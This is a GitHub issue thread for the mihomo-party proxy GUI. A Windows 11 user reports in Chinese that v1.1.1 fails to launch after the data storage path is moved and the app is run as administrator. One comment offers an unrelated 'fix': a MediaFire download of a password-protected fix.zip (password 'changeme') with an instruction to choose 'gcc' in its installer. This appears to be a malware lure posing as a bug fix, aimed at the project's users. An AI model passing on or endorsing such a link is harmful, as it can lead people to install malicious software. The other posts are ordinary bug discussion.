### ISSUE TITLE
[Bug] 

### ISSUE THREAD

**Issue by lisuid2** [pompurin404/mihomo-party#106]
### Verify steps

- [X] 我已在标题简短的描述了我所遇到的问题
- [X] 我未在[Issue Tracker](./?q=is%3Aissue)中找到我要提出的问题
- [X] 我未在[常见问题](https://mihomo.party/guides/issue/general/)中找到我要提出的问题
- [X] 这是GUI程序的问题,而不是内核程序的问题
- [X] 我已经使用最新的测试版本测试过，问题依旧存在

### 操作系统

Windows

### 系统版本

Windows 11

### 发生问题 mihomo-party 版本

v1.1.1

### 描述

就是我在设置里面修改这个数据存储路径不想让他在c盘，修改之后显示启动以管理员方式启动，我右键以管理员方式启动会反复弹出窗口并不能正常启动软件
![image](https://github.com/user-attachments/assets/b62ad07d-68a1-44e7-af96-ebc7a5a8cd88)

### 重现方式

修改数据存储路径到安装目录打开软件异常

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ghost** [comment]
1.1.1已经修复了
